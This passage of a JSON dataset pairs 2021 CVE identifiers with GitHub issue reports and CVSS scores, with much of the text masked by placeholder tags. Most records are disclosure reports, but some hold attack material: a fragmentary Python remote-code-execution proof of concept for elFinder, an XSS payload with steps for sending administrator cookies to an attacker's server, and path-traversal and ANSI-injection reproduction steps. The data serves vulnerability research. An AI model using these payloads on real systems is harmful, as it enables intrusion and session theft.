  63227. "description": "APITAG is not secure. ERRORTAG The reader is a default APITAG wrapping a APITAG . It will read from the connection until it finds a newline. Since no limits are implemented in the code, a deliberately malformed NUMBERTAG header could be used to exhaust memory in a server process using this code a form of APITAG The exploit is simple: send a stream starting with \"PROXY\" and keep sending data (which does not contain a newline) until the target stops acknowledging. In most real world circumstances, the actual risk is small since only trusted sources should be allowed to send proxy protocol headers. However, this is still a security issue and should be resolved. Easiest fix: APITAG and scan for a newline. If none is found, then it is not a valid version NUMBERTAG header anyway, so you can fail fast (the maximum NUMBERTAG header size is NUMBERTAG bytes). Otherwise, proceed with the APITAG in full confidence.",
  63228. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
  63229. "severity": "MEDIUM",
  63230. "baseScore": 4.9,
  63231. "impactScore": 3.6,
  63232. "exploitabilityScore": 1.2
  63233. },
  63234. {
  63235. "CVE_ID": "CVE-2021-23354",
  63236. "Issue_Url_old": "https://github.com/adaltas/node-printf/issues/31",
  63237. "Issue_Url_new": "https://github.com/adaltas/node-printf/issues/31",
  63238. "Repo_new": "adaltas/node-printf",
  63239. "Issue_Created_At": "2021-02-09T11:49:09Z",
  63240. "description": "APITAG in printf. Hi, I would like to report two Regular Expression Denial of Service APITAG vulnerability in printf . It allows cause a denial of service when using crafted invalid formats. You can execute the code below to reproduce the vulnerability.\u200b ERRORTAG Feel free to contact me if you have any questions. Best regards, Yeting Li\u200b\u200b\u200b\u200b",
  63241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63242. "severity": "HIGH",
  63243. "baseScore": 7.5,
  63244. "impactScore": 3.6,
  63245. "exploitabilityScore": 3.9
  63246. },
  63247. {
  63248. "CVE_ID": "CVE-2021-23357",
  63249. "Issue_Url_old": "https://github.com/TykTechnologies/tyk/issues/3390",
  63250. "Issue_Url_new": "https://github.com/tyktechnologies/tyk/issues/3390",
  63251. "Repo_new": "tyktechnologies/tyk",
  63252. "Issue_Created_At": "2020-11-17T23:13:51Z",
  63253. "description": "Security: Path Traversal Bug Able to delete/modify arbitrary JSON files via management API. PATHTAG APITAG FILETAG Environment: On Prem, Linux Describe the bug The function at URLTAG is able to delete arbitrary JSON files on disk where Tyk is running via the management API. The APIID is provided by the user and this value is then used to create a file on disk. If there is a file found with the same name then it will be deleted and then re created with the contents of the API creation request. Assume I create an API with PATHTAG if there is a JSON file at that location called FILETAG , it will be deleted and replaced with the API definition object from my request. This means NUMBERTAG things: Actors are able to traverse the file system of the Tyk host Actors are able to delete and modify any JSON file on the Tyk host Reproduction steps Create a file outside of where Tyk is storing the API definitions eg FILETAG Make a request to create an API with APIID '../something' Observe file get deleted and then overwritten Actual behavior Tyk deletes/modifies arbitrary JSON files Expected behavior Tyk should not use user defined input as part of file names. Recommended that the API gateway maintains a mapping between APITAG and a gateway generated APITAG i.e. a UUID. APITAG N/A Logs (debug mode or log file): N/A Configuration (tyk config file): N/A Additional context N/A",
  63254. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
  63255. "severity": "MEDIUM",
  63256. "baseScore": 5.3,
  63257. "impactScore": 3.4,
  63258. "exploitabilityScore": 1.8
  63259. },
  63260. {
  63261. "CVE_ID": "CVE-2021-23371",
  63262. "Issue_Url_old": "https://github.com/wanasit/chrono/issues/382",
  63263. "Issue_Url_new": "https://github.com/wanasit/chrono/issues/382",
  63264. "Repo_new": "wanasit/chrono",
  63265. "Issue_Created_At": "2021-03-07T23:45:58Z",
  63266. "description": "parse hangs on a date like string with lots of embedded spaces. Trying to parse this string never returns. lt looks like catastrophic backtracking in the regex matching, probably due to all the embedded spaces CODETAG",
  63267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63268. "severity": "HIGH",
  63269. "baseScore": 7.5,
  63270. "impactScore": 3.6,
  63271. "exploitabilityScore": 3.9
  63272. },
  63273. {
  63274. "CVE_ID": "CVE-2021-23394",
  63275. "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3295",
  63276. "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3295",
  63277. "Repo_new": "studio-42/elfinder",
  63278. "Issue_Created_At": "2021-05-08T17:34:35Z",
  63279. "description": "Remote Code Execution in APITAG NUMBERTAG create a .phar file using the following URL: FILETAG NUMBERTAG Add PHP code in the APITAG file by following GET request: URLTAG APITAG NUMBERTAG Execute the OS command with the privilege of the webserver: URLTAG Tested on apache and nginx webservers. By default it works in apache webserver and it requires .phar file to be executed as php code in nginx Python3 POC: import APITAG APITAG from pwn import import APITAG APITAG Chand\" APITAG APITAG def APITAG if APITAG APITAG python3 APITAG APITAG \") APITAG APITAG APITAG APITAG APITAG PATHTAG ) APITAG APITAG APITAG Za z NUMBERTAG for h in file_hash: APITAG APITAG PATHTAG APITAG &target=\"+hash_file) while True: cmd=raw_input(\"cmd>\") print(cmd) PATHTAG ()}\" res=wget(url, timeout NUMBERTAG APITAG if __name__==\"__main__\": APITAG",
  63280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63281. "severity": "CRITICAL",
  63282. "baseScore": 9.8,
  63283. "impactScore": 5.9,
  63284. "exploitabilityScore": 3.9
  63285. },
  63286. {
  63287. "CVE_ID": "CVE-2021-23398",
  63288. "Issue_Url_old": "https://github.com/AllenFang/react-bootstrap-table/issues/2071",
  63289. "Issue_Url_new": "https://github.com/allenfang/react-bootstrap-table/issues/2071",
  63290. "Repo_new": "allenfang/react-bootstrap-table",
  63291. "Issue_Created_At": "2019-04-18T11:30:31Z",
  63292. "description": "XSS when using APITAG function. Hi When using APITAG function and not converting the value to react component output is not sanitised. Therefore you can easily run XSS through it. Example: URLTAG",
  63293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63294. "severity": "MEDIUM",
  63295. "baseScore": 6.1,
  63296. "impactScore": 2.7,
  63297. "exploitabilityScore": 2.8
  63298. },
  63299. {
  63300. "CVE_ID": "CVE-2021-23400",
  63301. "Issue_Url_old": "https://github.com/nodemailer/nodemailer/issues/1289",
  63302. "Issue_Url_new": "https://github.com/nodemailer/nodemailer/issues/1289",
  63303. "Repo_new": "nodemailer/nodemailer",
  63304. "Issue_Created_At": "2021-05-22T22:32:40Z",
  63305. "description": "Header injection vulnerability in address object. Please fill the following questionnaire about your issue NUMBERTAG What kind of issue are you reporting? x] A bug in Nodemailer [ ] A bug in a plugin of Nodemailer (eg. issues with nodemailer sendgrid) [ ] Feature request [ ] Looking for help to resolve some kind of problem with Nodemailer NUMBERTAG Are you listed as a sponsor of Nodemailer project (see Sponsors button above)? [ ] Yes. Sponsors get priority support [x] No. Unless it is a bug in Nodemailer you might find support from public forums like APITAG URLTAG NUMBERTAG State your problem here: I've got a pretty standard APITAG call here in an HTTP handler: CODETAG An address that contains line breaks can add arbitrary SMTP headers. In my mind, the reason for using an address object is to avoid having to deal with escaping odd names and addresses (like would be necessary with APITAG NUMBERTAG name} APITAG NUMBERTAG APITAG ); therefore, it is expected that name and address don't have to be sanitized. Otherwise, it's not just an address object, but an \"address plus maybe arbitrary headers,\" which is not something anyone would _want_ to have. I'm not sure what other fields are vulnerable. This was discovered by APITAG",
  63306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63307. "severity": "HIGH",
  63308. "baseScore": 8.8,
  63309. "impactScore": 5.9,
  63310. "exploitabilityScore": 2.8
  63311. },
  63312. {
  63313. "CVE_ID": "CVE-2021-23409",
  63314. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/65",
  63315. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/65",
  63316. "Repo_new": "pires/go-proxyproto",
  63317. "Issue_Created_At": "2021-01-27T15:03:03Z",
  63318. "description": "Add Support for APITAG This library seems to lean heavily on inspiration from URLTAG That library supports passing in a timeout when you define the listener: APITAG It would be nice if the same feature, or a similar feature was possible with this library.",
  63319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63320. "severity": "HIGH",
  63321. "baseScore": 7.5,
  63322. "impactScore": 3.6,
  63323. "exploitabilityScore": 3.9
  63324. },
  63325. {
  63326. "CVE_ID": "CVE-2021-23409",
  63327. "Issue_Url_old": "https://github.com/pires/go-proxyproto/issues/75",
  63328. "Issue_Url_new": "https://github.com/pires/go-proxyproto/issues/75",
  63329. "Repo_new": "pires/go-proxyproto",
  63330. "Issue_Created_At": "2021-07-13T07:56:23Z",
  63331. "description": "APITAG is setting a hard timeout on connections regardless of header sending. I think this setting is supposed to timeout connections that are not sending the headers and terminate them after this amount of time. However, I set the setting to NUMBERTAG seconds, and the result is that all connections are terminated after NUMBERTAG seconds, even if they correctly sent the headers. The connection starts up, but is then abruptly ended after the NUMBERTAG seconds are passed. I think what is missing in NUMBERTAG is a call to APITAG to reset the timeout after the proxy header was sent successfully.",
  63332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63333. "severity": "HIGH",
  63334. "baseScore": 7.5,
  63335. "impactScore": 3.6,
  63336. "exploitabilityScore": 3.9
  63337. },
  63338. {
  63339. "CVE_ID": "CVE-2021-23418",
  63340. "Issue_Url_old": "https://github.com/nicolargo/glances/issues/1025",
  63341. "Issue_Url_new": "https://github.com/nicolargo/glances/issues/1025",
  63342. "Repo_new": "nicolargo/glances",
  63343. "Issue_Created_At": "2017-02-06T17:11:26Z",
  63344. "description": "Security audit. Description >> Issue: [B NUMBERTAG blacklist] Using Fault to parse untrusted XML data is known to be vulnerable to XML attacks. Use APITAG function to monkey patch xmlrpclib and mitigate XML vulnerabilities. Severity: High Confidence: High Location: APITAG NUMBERTAG from APITAG import APITAG APITAG NUMBERTAG from xmlrpclib import Fault, ERRORTAG APITAG Transport NUMBERTAG from urllib2 import urlopen, ERRORTAG Versions Glances (glances NUMBERTAG",
  63345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63346. "severity": "CRITICAL",
  63347. "baseScore": 9.8,
  63348. "impactScore": 5.9,
  63349. "exploitabilityScore": 3.9
  63350. },
  63351. {
  63352. "CVE_ID": "CVE-2021-23442",
  63353. "Issue_Url_old": "https://github.com/tony-tsx/cookiex-deep/issues/1",
  63354. "Issue_Url_new": "https://github.com/tony-tsx/cookiex-deep/issues/1",
  63355. "Repo_new": "tony-tsx/cookiex-deep",
  63356. "Issue_Created_At": "2021-09-06T06:29:37Z",
  63357. "description": "APITAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG",
  63358. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63359. "severity": "CRITICAL",
  63360. "baseScore": 9.8,
  63361. "impactScore": 5.9,
  63362. "exploitabilityScore": 3.9
  63363. },
  63364. {
  63365. "CVE_ID": "CVE-2021-23446",
  63366. "Issue_Url_old": "https://github.com/handsontable/handsontable/issues/8752",
  63367. "Issue_Url_new": "https://github.com/handsontable/handsontable/issues/8752",
  63368. "Repo_new": "handsontable/handsontable",
  63369. "Issue_Created_At": "2021-09-27T08:57:20Z",
  63370. "description": "Fix APITAG vulnerability and clean up major code smells. Description Steps to reproduce NUMBERTAG Demo URLTAG Your environment Handsontable version: Browser Name and version: Operating System:",
  63371. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63372. "severity": "HIGH",
  63373. "baseScore": 7.5,
  63374. "impactScore": 3.6,
  63375. "exploitabilityScore": 3.9
  63376. },
  63377. {
  63378. "CVE_ID": "CVE-2021-23448",
  63379. "Issue_Url_old": "https://github.com/jarradseers/config-handler/issues/1",
  63380. "Issue_Url_new": "https://github.com/jarradseers/config-handler/issues/1",
  63381. "Repo_new": "jarradseers/config-handler",
  63382. "Issue_Created_At": "2021-08-15T13:34:55Z",
  63383. "description": "Vulnerable to Prototype Pollution. Hey i recently found that your package is vulnerable to Prototype Pollution. FILETAG APITAG FILETAG APITAG _output_ polluted",
  63384. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63385. "severity": "CRITICAL",
  63386. "baseScore": 9.8,
  63387. "impactScore": 5.9,
  63388. "exploitabilityScore": 3.9
  63389. },
  63390. {
  63391. "CVE_ID": "CVE-2021-23449",
  63392. "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/363",
  63393. "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/363",
  63394. "Repo_new": "patriksimek/vm2",
  63395. "Issue_Created_At": "2021-09-07T09:20:16Z",
  63396. "description": "Sandbox breakout. Hi, I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: URLTAG",
  63397. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  63398. "severity": "CRITICAL",
  63399. "baseScore": 10.0,
  63400. "impactScore": 6.0,
  63401. "exploitabilityScore": 3.9
  63402. },
  63403. {
  63404. "CVE_ID": "CVE-2021-23556",
  63405. "Issue_Url_old": "https://github.com/Guake/guake/issues/1796",
  63406. "Issue_Url_new": "https://github.com/guake/guake/issues/1796",
  63407. "Repo_new": "guake/guake",
  63408. "Issue_Created_At": "2020-09-21T07:44:14Z",
  63409. "description": "Security Issue: Exposure of sensitive function, malicious user can arbitrary command via an execute_command d bus method.. Describe the bug We understand that the usability of APITAG option. ( URLTAG BTW, it must not be exposure in d bus interfaces. Expected behavior guake must not exposure execute_command in d bus interfaces. Do not exposure execute_command in d bus interface. Actual behavior guake exposure execute_command in d bus interface. To Reproduce We can use gdbus to call an execute_command d bus method. CODETAG ERRORTAG cc. APITAG",
  63410. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  63411. "severity": "HIGH",
  63412. "baseScore": 8.0,
  63413. "impactScore": 5.9,
  63414. "exploitabilityScore": 2.1
  63415. },
  63416. {
  63417. "CVE_ID": "CVE-2021-23567",
  63418. "Issue_Url_old": "https://github.com/Marak/colors.js/issues/285",
  63419. "Issue_Url_new": "https://github.com/marak/colors.js/issues/285",
  63420. "Repo_new": "marak/colors.js",
  63421. "Issue_Created_At": "2022-01-08T04:26:12Z",
  63422. "description": "Zalgo issue with APITAG release. It's come to our attention that there is a zalgo bug in the APITAG release of colors. Please know we are working right now to fix the situation and will have a resolution shortly. FILETAG",
  63423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  63424. "severity": "HIGH",
  63425. "baseScore": 7.5,
  63426. "impactScore": 3.6,
  63427. "exploitabilityScore": 3.9
  63428. },
  63429. {
  63430. "CVE_ID": "CVE-2021-23574",
  63431. "Issue_Url_old": "https://github.com/js-data/js-data/issues/576",
  63432. "Issue_Url_new": "https://github.com/js-data/js-data/issues/576",
  63433. "Repo_new": "js-data/js-data",
  63434. "Issue_Created_At": "2021-05-08T22:09:49Z",
  63435. "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  63436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63437. "severity": "CRITICAL",
  63438. "baseScore": 9.8,
  63439. "impactScore": 5.9,
  63440. "exploitabilityScore": 3.9
  63441. },
  63442. {
  63443. "CVE_ID": "CVE-2021-23574",
  63444. "Issue_Url_old": "https://github.com/js-data/js-data/issues/577",
  63445. "Issue_Url_new": "https://github.com/js-data/js-data/issues/577",
  63446. "Repo_new": "js-data/js-data",
  63447. "Issue_Created_At": "2021-05-09T11:04:37Z",
  63448. "description": "\ud83d\udea8 Potential Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ). \ud83d\udc4b Hello, MENTIONTAG MENTIONTAG MENTIONTAG a potential high severity Improperly Controlled Modification of Object Prototype Attributes APITAG Pollution') ( CVETAG ) vulnerability in your repository has been disclosed to us. Next Steps NUMBERTAG isit URLTAG for more advisory information NUMBERTAG FILETAG to validate or speak to the researcher for more assistance NUMBERTAG Propose a patch or outsource it to our community whoever fixes it gets paid. Confused or need more help? Join us on our Discord URLTAG and a member of our team will be happy to help! \ud83e\udd17 Speak to a member of our team: MENTIONTAG This issue was automatically generated by FILETAG a bug bounty board for securing open source code.",
  63449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63450. "severity": "CRITICAL",
  63451. "baseScore": 9.8,
  63452. "impactScore": 5.9,
  63453. "exploitabilityScore": 3.9
  63454. },
  63455. {
  63456. "CVE_ID": "CVE-2021-23639",
  63457. "Issue_Url_old": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
  63458. "Issue_Url_new": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
  63459. "Repo_new": "simonhaenisch/md-to-pdf",
  63460. "Issue_Created_At": "2021-09-22T07:38:13Z",
  63461. "description": "Security: gray matter exposes front matter JS engine that leads to arbitrary code execution. The library gray matter URLTAG (used by md to pdf to parse front matter) exposes a JS engine by default, which essentially runs eval on the given Markdown. URLTAG Given that md to pdf is _only_ a Markdown to PDF library and looking at how other projects use it I think it is an undesirable _feature_ to be able to execute any arbitrary Javascript by anyone in control of the Markdown content. A possible fix would be to override gray matter's JS engine: APITAG APITAG CODETAG poc.js: CODETAG",
  63462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63463. "severity": "CRITICAL",
  63464. "baseScore": 9.8,
  63465. "impactScore": 5.9,
  63466. "exploitabilityScore": 3.9
  63467. },
  63468. {
  63469. "CVE_ID": "CVE-2021-23803",
  63470. "Issue_Url_old": "https://github.com/nette/latte/issues/279",
  63471. "Issue_Url_new": "https://github.com/nette/latte/issues/279",
  63472. "Repo_new": "nette/latte",
  63473. "Issue_Created_At": "2021-11-21T07:06:14Z",
  63474. "description": "There is a way to bypass APITAG Version NUMBERTAG Bug Description There is a way to bypass APITAG that will affect security. Steps To Reproduce ERRORTAG This will execute the system function. Expected Behavior Should throw an error not allowed by system function Possible Solution Use rigorous regular expression segmentation, or add more rigorous judgments in ERRORTAG function",
  63475. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63476. "severity": "CRITICAL",
  63477. "baseScore": 9.8,
  63478. "impactScore": 5.9,
  63479. "exploitabilityScore": 3.9
  63480. },
  63481. {
  63482. "CVE_ID": "CVE-2021-24031",
  63483. "Issue_Url_old": "https://github.com/facebook/zstd/issues/1630",
  63484. "Issue_Url_new": "https://github.com/facebook/zstd/issues/1630",
  63485. "Repo_new": "facebook/zstd",
  63486. "Issue_Created_At": "2019-06-04T18:29:11Z",
  63487. "description": "zstd adds read permissions to files while being compressed or uncompressed. While the final file mode is reflective of the input file, when compressing or uncompressing, the file can temporarily gain greater permissions than the input and potentially leading to security issues (especially if large files are being handled). Example: file has mode NUMBERTAG zstd file > APITAG has mode NUMBERTAG while compression is happening. APITAG happens with ERRORTAG and file )",
  63488. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  63489. "severity": "MEDIUM",
  63490. "baseScore": 5.5,
  63491. "impactScore": 3.6,
  63492. "exploitabilityScore": 1.8
  63493. },
  63494. {
  63495. "CVE_ID": "CVE-2021-24032",
  63496. "Issue_Url_old": "https://github.com/facebook/zstd/issues/2491",
  63497. "Issue_Url_new": "https://github.com/facebook/zstd/issues/2491",
  63498. "Repo_new": "facebook/zstd",
  63499. "Issue_Created_At": "2021-02-11T07:41:51Z",
  63500. "description": "Race condition allows attacker to access world readable destination file. The patches for NUMBERTAG still create the file with the default umask, before chmod'ing down to NUMBERTAG so an attacker could still open it in the meantime. inotify can for instance help automating such an attack. zstd should either set the mode directly through open NUMBERTAG or use umask NUMBERTAG before creating the file. This is Debian bug CVETAG",
  63501. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  63502. "severity": "MEDIUM",
  63503. "baseScore": 4.7,
  63504. "impactScore": 3.6,
  63505. "exploitabilityScore": 1.0
  63506. },
  63507. {
  63508. "CVE_ID": "CVE-2021-24241",
  63509. "Issue_Url_old": "https://github.com/jdordonezn/Reflected-XSS-in-WordPress-for-ACF-PRO-before-5.9.1-plugin/issues/1",
  63510. "Issue_Url_new": "https://github.com/jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin/issues/1",
  63511. "Repo_new": "jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin",
  63512. "Issue_Created_At": "2021-01-20T17:51:53Z",
  63513. "description": "Reflected XSS in APITAG for APITAG Custom Fields PRO' plugin. APITAG allows APITAG site Scripting Reflected' in resource FILETAG , because the call an update page of Advanced Custom Fields PRO APITAG before NUMBERTAG plugin, enable injections of APITAG code. Steps to reproduce the vulnerability NUMBERTAG Add the payload XSS at the end of the url, so: URLTAG \"> APITAG alert('XSS') APITAG NUMBERTAG However, after of try some payloads I see the FILETAG NUMBERTAG I found a way to bypass this problem, in the request replace FILETAG NUMBERTAG Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example FILETAG NUMBERTAG Of course, previously must encode in URL the payload that calls previous script, so URLTAG APITAG FILETAG NUMBERTAG Send the payload and you will see two request, the first make a promise for sending the cookies and second is where the promise is executed. FILETAG NUMBERTAG Now the hacker has cookies of administrator user in the evil server. FILETAG Remediation I held messages with the dev team of Advanced Custom Fields, they fixed the vulnerability in the versi\u00f3n NUMBERTAG of ACF PRO, here is the report URLTAG",
  63514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63515. "severity": "MEDIUM",
  63516. "baseScore": 6.1,
  63517. "impactScore": 2.7,
  63518. "exploitabilityScore": 2.8
  63519. },
  63520. {
  63521. "CVE_ID": "CVE-2021-25313",
  63522. "Issue_Url_old": "https://github.com/rancher/rancher/issues/31583",
  63523. "Issue_Url_new": "https://github.com/rancher/rancher/issues/31583",
  63524. "Repo_new": "rancher/rancher",
  63525. "Issue_Created_At": "2021-03-04T05:15:24Z",
  63526. "description": "PH NUMBERTAG",
  63527. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63528. "severity": "MEDIUM",
  63529. "baseScore": 6.1,
  63530. "impactScore": 2.7,
  63531. "exploitabilityScore": 2.8
  63532. },
  63533. {
  63534. "CVE_ID": "CVE-2021-25735",
  63535. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/100096",
  63536. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/100096",
  63537. "Repo_new": "kubernetes/kubernetes",
  63538. "Issue_Created_At": "2021-03-10T18:18:01Z",
  63539. "description": "APITAG",
  63540. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  63541. "severity": "MEDIUM",
  63542. "baseScore": 6.5,
  63543. "impactScore": 5.2,
  63544. "exploitabilityScore": 1.2
  63545. },
  63546. {
  63547. "CVE_ID": "CVE-2021-25737",
  63548. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/102106",
  63549. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/102106",
  63550. "Repo_new": "kubernetes/kubernetes",
  63551. "Issue_Created_At": "2021-05-18T19:14:27Z",
  63552. "description": "CVETAG : Holes in APITAG Validation Enable Host Network Hijack. Issue Details A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link local range, but the same validation was not performed on APITAG IPs. This issue has been rated Low ( PATHTAG URLTAG , and assigned CVETAG . Affected Component kube apiserver Affected Versions NUMBERTAG APITAG APITAG were not enabled by default in NUMBERTAG Fixed Versions This issue is fixed in the following versions NUMBERTAG Mitigation To mitigate this vulnerability without upgrading kube apiserver, you can create a validating admission webhook that prevents APITAG with endpoint addresses in the APITAG and APITAG ranges. If you have an existing admission policy mechanism (like OPA Gatekeeper) you can create a policy that enforces this restriction. Detection To detect whether this vulnerability has been exploited, you can list APITAG and check for endpoint addresses in the APITAG and APITAG ranges. If you find evidence that this vulnerability has been exploited, please contact security APITAG Acknowledgements This vulnerability was reported by John Howard of Google.",
  63553. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  63554. "severity": "MEDIUM",
  63555. "baseScore": 4.8,
  63556. "impactScore": 2.7,
  63557. "exploitabilityScore": 1.7
  63558. },
  63559. {
  63560. "CVE_ID": "CVE-2021-25740",
  63561. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/103675",
  63562. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/103675",
  63563. "Repo_new": "kubernetes/kubernetes",
  63564. "Issue_Created_At": "2021-07-14T03:30:07Z",
  63565. "description": "WIP.",
  63566. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  63567. "severity": "LOW",
  63568. "baseScore": 3.1,
  63569. "impactScore": 1.4,
  63570. "exploitabilityScore": 1.6
  63571. },
  63572. {
  63573. "CVE_ID": "CVE-2021-25741",
  63574. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104980",
  63575. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104980",
  63576. "Repo_new": "kubernetes/kubernetes",
  63577. "Issue_Created_At": "2021-09-13T20:58:56Z",
  63578. "description": "PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
  63579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  63580. "severity": "HIGH",
  63581. "baseScore": 8.1,
  63582. "impactScore": 5.2,
  63583. "exploitabilityScore": 2.8
  63584. },
  63585. {
  63586. "CVE_ID": "CVE-2021-25743",
  63587. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101695",
  63588. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101695",
  63589. "Repo_new": "kubernetes/kubernetes",
  63590. "Issue_Created_At": "2021-05-02T12:06:24Z",
  63591. "description": "ANSI escape characters in Event JSON objects are not being filtered. It is a security issue, but after contacting security APITAG Tim and the team confirmed that they are comfortable posting it publicly. What happened: Kubernetes doesn't sanitize the 'message' field in the Event JSON objects. Notice that this is relevant only to JSON objects, not YAML objects. By creating new event, we can insert ANSI escape characters inside the \"message\" field, like: APITAG This an example of such JSON request: CODETAG The codes: APITAG > Clean the screen and history APITAG > Clean the entire screen and delete all lines saved in the scrollback buffer APITAG > Moves the cursor position to row NUMBERTAG column NUMBERTAG beginning). APITAG > Set the colors APITAG > Move the cursor forward NUMBERTAG steps APITAG > Set the text colors to white The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events. What you expected to happen: The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal). Or maybe some message that says that you can't use ANSI escape characters. How to reproduce it (as minimally and precisely as possible NUMBERTAG Run this code: CODETAG It will create a new event NUMBERTAG Run kubectl get events , you will see that the screen was clear, you will get a \"spoof\" message, and all the rest events or columns were gone. Anything else we need to know?: It might look like a low severity issue, but there are other variety of things we can do, from APITAG by using colors to hide all the events, changing the title of the terminal window, and spoof the data. It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism. ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVETAG ). Environment: Kubernetes version (use kubectl version ): CODETAG Cloud provider or hardware configuration: OS (e.g: APITAG ): ERRORTAG Kernel (e.g. ERRORTAG ): APITAG Install tools: minikube APITAG Network plugin and version (if this is a network related bug): Others: we also reproduced it in Kubernetes (not minikube) version NUMBERTAG",
  63592. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N",
  63593. "severity": "LOW",
  63594. "baseScore": 3.0,
  63595. "impactScore": 1.4,
  63596. "exploitabilityScore": 1.3
  63597. },
  63598. {
  63599. "CVE_ID": "CVE-2021-25745",
  63600. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8502",
  63601. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8502",
  63602. "Repo_new": "kubernetes/ingress-nginx",
  63603. "Issue_Created_At": "2022-04-22T16:18:21Z",
  63604. "description": "Placeholder.",
  63605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  63606. "severity": "HIGH",
  63607. "baseScore": 8.1,
  63608. "impactScore": 5.2,
  63609. "exploitabilityScore": 2.8
